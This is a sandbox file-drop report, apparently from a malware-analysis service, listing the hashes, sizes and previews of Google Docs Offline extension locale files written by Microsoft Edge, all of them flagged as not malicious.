                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                  Malicious:false
